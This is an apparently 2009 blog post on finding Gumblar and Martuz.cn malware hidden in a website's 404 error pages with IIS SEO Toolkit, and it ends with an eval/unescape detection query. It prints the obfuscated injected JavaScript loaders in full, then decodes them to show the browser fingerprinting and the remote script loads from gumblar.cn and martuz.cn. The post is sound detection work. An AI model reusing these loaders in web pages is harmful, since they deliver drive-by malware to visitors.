Finding malware in your Web Site using IIS SEO Toolkit
The other day a friend of mine who owns a Web site asked me to look at his Web site to see if I could spot anything weird since according to his Web Hosting provider it was being flagged as malware infected by Google.
My friend (who is not technical at all) talked to his Web site designer and mentioned the problem. He downloaded the HTML pages and tried looking for anything suspicious on them, however he was not able to find anything. My friend then went back to his Hosting provider and mentioned the fact that they were not able to find anything problematic and that if it could be something with the server configuration, to which they replied in a sarcastic way that it was probably ignorance on his Web site designer.
Enter IIS SEO Toolkit
So of course I decided the first thing I would do is to start by crawling the Web site using Site Analysis in IIS SEO Toolkit. This gave me a list of the pages and resources that his Web site would have. First thing I knew is usually malware hides either in executables or scripts on the server, so I started looking for the different content types shown in the "Content Types Summary" inside the Content reports in the dashboard page.
I was surprised to no found a single executable and to only see two very simple javascripts which looked not like malware in any way. So based on previous knowledge I knew that malware in HTML pages usually is hidden behind a funky looking script that is encoded and usually uses the eval function to run the code. So I quickly did a query for those HTML pages which contain the word eval and contain the word unescape. I know there are valid scripts that could include those features since they exist for a reason but it was a good way to get scoping the pages.
Gumblar and Martuz.cn Malware on sight
After running the query as shown above, I got a set of HTML files which all gave a status code 404 – NOT FOUND. Double clicking in any of them and looking at the HTML markup content made it immediately obvious they were malware infected, look at the following markup:
<HEAD>
<TITLE>404 Not Found</TITLE>
</HEAD>
<script language=javascript><!--
(function(AO9h){var x752='%';var qAxG='va"72"20a"3d"22Scr"69pt"45ng"69ne"22"2cb"3d"22Version("29"2b"22"2c"6a"3d"22"22"2cu"3dnav"69g"61"74or"2e"75ser"41gent"3bif((u"2e"69ndexO"66"28"22Win"22)"3e0)"26"26(u"2eindexOf("22NT"206"22"29"3c0)"26"26(document"2e"63o"6fkie"2ei"6e"64exOf("22mi"65"6b"3d1"22)"3c0)"26"26"28typ"65"6ff"28"7arv"7a"74"73"29"21"3dty"70e"6f"66"28"22A"22))"29"7b"7arvzts"3d"22A"22"3be"76a"6c("22i"66(wi"6edow"2e"22+a"2b"22)j"3d"6a+"22+a+"22Major"22+b+a"2b"22M"69no"72"22"2bb+a+"22"42"75"69ld"22+b+"22"6a"3b"22)"3bdocume"6e"74"2ewrite"28"22"3cs"63"72ipt"20"73rc"3d"2f"2fgum"62la"72"2ecn"2f"72ss"2f"3fid"3d"22+j+"22"3e"3c"5c"2fsc"72ipt"3e"22)"3b"7d';var Fda=unescape(qAxG.replace(AO9h,x752));eval(Fda)})(/"/g);
--></script><script language=javascript><!--
(function(rSf93){var SKrkj='%';var METKG=unescape(('var~20~61~3d~22S~63~72i~70~74Engine~22~2cb~3d~22Version()+~22~2cj~3d~22~22~2c~75~3dn~61v~69ga~74o~72~2e~75se~72Agen~74~3b~69f(~28u~2eind~65~78~4ff(~22Chro~6d~65~22~29~3c~30)~26~26(~75~2e~69ndexOf(~22Wi~6e~22)~3e0)~26~26(u~2e~69ndexOf(~22~4eT~206~22~29~3c0~29~26~26(doc~75~6dent~2ecook~69e~2ein~64exOf(~22miek~3d1~22)~3c~30)~26~26~28typeof(zrv~7at~73)~21~3dtyp~65~6ff(~22A~22~29))~7bzrv~7at~73~3d~22~41~22~3b~65~76al(~22i~66(w~69ndow~2e~22+a+~22)~6a~3dj+~22+~61+~22M~61jor~22+b~2b~61+~22~4dinor~22+~62+a~2b~22B~75ild~22~2bb+~22j~3b~22)~3bdocu~6d~65n~74~2e~77rit~65(~22~3cs~63r~69pt~20src~3d~2f~2f~6dar~22~2b~22tuz~2ec~6e~2f~76~69d~2f~3f~69d~3d~22+j+~22~3e~3c~5c~2fscr~69pt~3e~22)~3b~7d').replace(rSf93,SKrkj));eval(METKG)})(/\~/g);
--></script><BODY>
<H1>Not Found</H1>
The requested document was not found on this server.
<P>
<HR>
<ADDRESS>
Web Server at **********
</ADDRESS>
</BODY>
</HTML>
Notice those two ugly scripts that seem to be just a random set of numbers, quotes and letters? I do not believe I've ever met a developer that writes code like that in real web applications.
For those of you like me that do not particularly enjoy reading encoded Javascript what these two scripts do is just unescape the funky looking string and then execute it. I have un-encoded the script that would get executed and showed it below just to show case how this malware works. Note how they special case a couple browsers including Chrome to request then a particular script that will cause the real damage.
b = "Version()+",
j = "",
u = navigator.userAgent;
if ((u.indexOf("Win") > 0) && (u.indexOf("NT 6") < 0) && (document.cookie.indexOf("miek=1") < 0) && (typeof (zrvzts) != typeof ("A"))) {
zrvzts = "A";
eval("if(window." + a + ")j=j+" + a + "Major" + b + a + "Minor" + b + a + "Build" + b + "j;");
document.write("<script src=//gumblar.cn/rss/?id=" + j + "><\/script>");
}
And:
b="Version()+",
j="",u=navigator.userAgent;
if((u.indexOf("Chrome")<0)&&(u.indexOf("Win")>0)&&(u.indexOf("NT 6")<0)&&(document.cookie.indexOf("miek=1")<0)&&(typeof(zrvzts)!=typeof("A"))){
zrvzts="A";
eval("if(window."+a+")j=j+"+a+"Major"+b+a+"Minor"+b+a+"Build"+b+"j;");document.write("<script src=//martuz.cn/vid/?id="+j+"><\/script>");
}
Notice how both of them end up writing the actual malware script living in martuz.cn and gumblar.cn.
Final data
Now, this clearly means they are infected with malware, and it clearly seems that the problem is not in the Web Application but the infection is in the Error Pages that are being served from the Server when an error happens. Next step to be able to guide them with more specifics I needed to determine the Web server that they were using, to do that it is as easy as just inspecting the headers in the IIS SEO Toolkit which displayed something like the ones shown below:
Content-Length: 2570
Content-Type: text/html
Date: Sat, 20 Jun 2009 01:16:23 GMT
Last-Modified: Sun, 17 May 2009 06:43:38 GMT
Server: Apache/2.2.3 (Debian) mod_jk/1.2.18 PHP/5.2.0-8+etch15 mod_ssl/2.2.3 OpenSSL/0.9.8c mod_perl/2.0.2 Perl/v5.8.8
With a big disclaimer that I know nothing about Apache, I then guided them to their .htaccess file and the httpd.conf file for ErrorDocument and that would show them which files were infected and if it was a problem in their application or the server.
Case Closed
Turns out that after they went back to their Hoster with all this evidence, they finally realized that their server was infected and were able to clean up the malware. IIS SEO Toolkit helped me quickly identify this based on the fact that is able to see the Web site with the same eyes as a Search Engine would, following every link and letting me perform easy queries to find information about it. In future versions of IIS SEO Toolkit you can expect to be able to find this kind of things in a lot simpler ways, but for Beta 1 for those who cares here is the query that you can save in an XML file and use "Open Query" to see if you are infected with these malware.
<query dataSource="urls">
<filter>
<expression field="ContentTypeNormalized" operator="Equals" value="text/html" />
<expression field="FileContents" operator="Contains" value="unescape" />
<expression field="FileContents" operator="Contains" value="eval" />
</filter>
<displayFields>
<field name="URL" />
<field name="StatusCode" />
<field name="Title" />
<field name="Description" />
</displayFields>
</query>